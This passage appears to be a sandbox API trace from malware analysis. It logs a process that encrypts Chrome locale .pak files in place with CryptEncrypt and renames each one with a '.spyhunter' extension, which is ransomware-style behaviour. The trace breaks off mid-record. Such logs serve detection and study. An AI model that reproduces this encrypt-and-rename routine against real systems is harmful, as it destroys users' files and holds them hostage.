[0175.742] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x25ce3bc*, lpNumberOfBytesWritten=0x25ce37c*=0x4, lpOverlapped=0x0) returned 1 [0175.747] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce37c*=0x30, lpOverlapped=0x0) returned 1 [0175.747] CloseHandle (hObject=0xb0) returned 1 [0175.747] GetProcessHeap () returned 0x2c0000 [0175.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.747] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak.spyhunter") returned 91 [0175.747] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\vi.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\vi.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\vi.pak.spyhunter")) returned 1 [0175.749] GetProcessHeap () returned 0x2c0000 [0175.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.749] GetProcessHeap () returned 0x2c0000 [0175.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.749] GetProcessHeap () returned 0x2c0000 [0175.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece650 | out: hHeap=0x2c0000) returned 1 [0175.749] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3c0 | out: pbBuffer=0x25ce3c0) returned 1 [0175.749] GetProcessHeap () returned 0x2c0000 [0175.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.749] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3b8*=0x30) returned 1 [0175.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\tr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.750] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak") returned 81 [0175.750] StrStrW (lpFirst="tr.pak", lpSrch=".txt") returned 0x0 [0175.750] GetProcessHeap () returned 0x2c0000 [0175.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.751] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce37c*=0x2800, lpOverlapped=0x0) returned 1 [0175.775] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.775] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce37c*=0x2800, lpOverlapped=0x0) returned 1 [0175.775] GetProcessHeap () returned 0x2c0000 [0175.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.775] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.775] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x25ce3bc*, lpNumberOfBytesWritten=0x25ce37c*=0x4, lpOverlapped=0x0) returned 1 [0175.781] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce37c*=0x30, lpOverlapped=0x0) returned 1 [0175.781] CloseHandle (hObject=0xb0) returned 1 [0175.781] GetProcessHeap () returned 0x2c0000 [0175.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.781] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak.spyhunter") returned 91 [0175.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\tr.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\tr.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\tr.pak.spyhunter")) returned 1 [0175.783] GetProcessHeap () returned 0x2c0000 [0175.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.783] GetProcessHeap () returned 0x2c0000 [0175.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.783] GetProcessHeap () returned 0x2c0000 [0175.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece470 | out: hHeap=0x2c0000) returned 1 [0175.783] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3b8 | out: pbBuffer=0x25ce3b8) returned 1 [0175.783] GetProcessHeap () returned 0x2c0000 [0175.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.783] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3b0*=0x30) returned 1 [0175.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ta.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.784] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak") returned 81 [0175.784] StrStrW (lpFirst="ta.pak", lpSrch=".txt") returned 0x0 [0175.784] GetProcessHeap () returned 0x2c0000 [0175.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.784] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce374*=0x2800, lpOverlapped=0x0) returned 1 [0175.808] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.808] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce374*=0x2800, lpOverlapped=0x0) returned 1 [0175.808] GetProcessHeap () returned 0x2c0000 [0175.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.808] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.808] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x25ce3b4*, lpNumberOfBytesWritten=0x25ce374*=0x4, lpOverlapped=0x0) returned 1 [0175.841] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce374*=0x30, lpOverlapped=0x0) returned 1 [0175.841] CloseHandle (hObject=0xb0) returned 1 [0175.948] GetProcessHeap () returned 0x2c0000 [0175.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.948] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak.spyhunter") returned 91 [0175.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ta.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ta.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ta.pak.spyhunter")) returned 1 [0175.949] GetProcessHeap () returned 0x2c0000 [0175.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.949] GetProcessHeap () returned 0x2c0000 [0175.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.950] GetProcessHeap () returned 0x2c0000 [0175.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece1a0 | out: hHeap=0x2c0000) returned 1 [0175.950] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3b8 | out: pbBuffer=0x25ce3b8) returned 1 [0175.950] GetProcessHeap () returned 0x2c0000 [0175.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.950] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3b0*=0x30) returned 1 [0175.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ru.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.951] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak") returned 81 [0175.951] StrStrW (lpFirst="ru.pak", lpSrch=".txt") returned 0x0 [0175.951] GetProcessHeap () returned 0x2c0000 [0175.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.951] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce374*=0x2800, lpOverlapped=0x0) returned 1 [0175.987] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.987] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce374*=0x2800, lpOverlapped=0x0) returned 1 [0175.987] GetProcessHeap () returned 0x2c0000 [0175.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.987] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.987] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x25ce3b4*, lpNumberOfBytesWritten=0x25ce374*=0x4, lpOverlapped=0x0) returned 1 [0176.028] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce374, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce374*=0x30, lpOverlapped=0x0) returned 1 [0176.028] CloseHandle (hObject=0xb0) returned 1 [0176.077] GetProcessHeap () returned 0x2c0000 [0176.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.077] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak.spyhunter") returned 91 [0176.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ru.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ru.pak.spyhunter")) returned 1 [0176.079] GetProcessHeap () returned 0x2c0000 [0176.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.079] GetProcessHeap () returned 0x2c0000 [0176.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.079] GetProcessHeap () returned 0x2c0000 [0176.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecdbe0 | out: hHeap=0x2c0000) returned 1 [0176.080] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3b0 | out: pbBuffer=0x25ce3b0) returned 1 [0176.080] GetProcessHeap () returned 0x2c0000 [0176.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.080] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3a8*=0x30) returned 1 [0176.080] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-br.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.081] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak") returned 84 [0176.081] StrStrW (lpFirst="pt-BR.pak", lpSrch=".txt") returned 0x0 [0176.081] GetProcessHeap () returned 0x2c0000 [0176.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0176.081] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce36c*=0x2800, lpOverlapped=0x0) returned 1 [0176.122] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.122] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce36c*=0x2800, lpOverlapped=0x0) returned 1 [0176.122] GetProcessHeap () returned 0x2c0000 [0176.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0176.122] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.122] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x25ce3ac*, lpNumberOfBytesWritten=0x25ce36c*=0x4, lpOverlapped=0x0) returned 1 [0176.132] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce36c*=0x30, lpOverlapped=0x0) returned 1 [0176.133] CloseHandle (hObject=0xa0) returned 1 [0176.133] GetProcessHeap () returned 0x2c0000 [0176.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.133] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak.spyhunter") returned 94 [0176.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-br.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-br.pak.spyhunter")) returned 1 [0176.134] GetProcessHeap () returned 0x2c0000 [0176.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.134] GetProcessHeap () returned 0x2c0000 [0176.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.134] GetProcessHeap () returned 0x2c0000 [0176.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca4a8 | out: hHeap=0x2c0000) returned 1 [0176.134] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3b0 | out: pbBuffer=0x25ce3b0) returned 1 [0176.135] GetProcessHeap () returned 0x2c0000 [0176.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.135] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3a8*=0x30) returned 1 [0176.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ms.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.136] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak") returned 81 [0176.136] StrStrW (lpFirst="ms.pak", lpSrch=".txt") returned 0x0 [0176.136] GetProcessHeap () returned 0x2c0000 [0176.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.136] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce36c*=0x2800, lpOverlapped=0x0) returned 1 [0176.141] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.141] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce36c*=0x2800, lpOverlapped=0x0) returned 1 [0176.141] GetProcessHeap () returned 0x2c0000 [0176.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.141] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.142] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x25ce3ac*, lpNumberOfBytesWritten=0x25ce36c*=0x4, lpOverlapped=0x0) returned 1 [0176.144] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce36c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce36c*=0x30, lpOverlapped=0x0) returned 1 [0176.144] CloseHandle (hObject=0xa0) returned 1 [0176.144] GetProcessHeap () returned 0x2c0000 [0176.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.144] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak.spyhunter") returned 91 [0176.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ms.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ms.pak.spyhunter")) returned 1 [0176.145] GetProcessHeap () returned 0x2c0000 [0176.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.145] GetProcessHeap () returned 0x2c0000 [0176.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.145] GetProcessHeap () returned 0x2c0000 [0176.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd730 | out: hHeap=0x2c0000) returned 1 [0176.145] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3a8 | out: pbBuffer=0x25ce3a8) returned 1 [0176.145] GetProcessHeap () returned 0x2c0000 [0176.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3a0*=0x30) returned 1 [0176.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ml.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.148] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak") returned 81 [0176.148] StrStrW (lpFirst="ml.pak", lpSrch=".txt") returned 0x0 [0176.148] GetProcessHeap () returned 0x2c0000 [0176.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.148] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce364*=0x2800, lpOverlapped=0x0) returned 1 [0176.238] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.238] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce364*=0x2800, lpOverlapped=0x0) returned 1 [0176.239] GetProcessHeap () returned 0x2c0000 [0176.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.239] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.239] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x25ce3a4*, lpNumberOfBytesWritten=0x25ce364*=0x4, lpOverlapped=0x0) returned 1 [0176.288] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce364*=0x30, lpOverlapped=0x0) returned 1 [0176.288] CloseHandle (hObject=0xa0) returned 1 [0176.351] GetProcessHeap () returned 0x2c0000 [0176.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.351] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak.spyhunter") returned 91 [0176.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak" (normalized: "c:\\program files 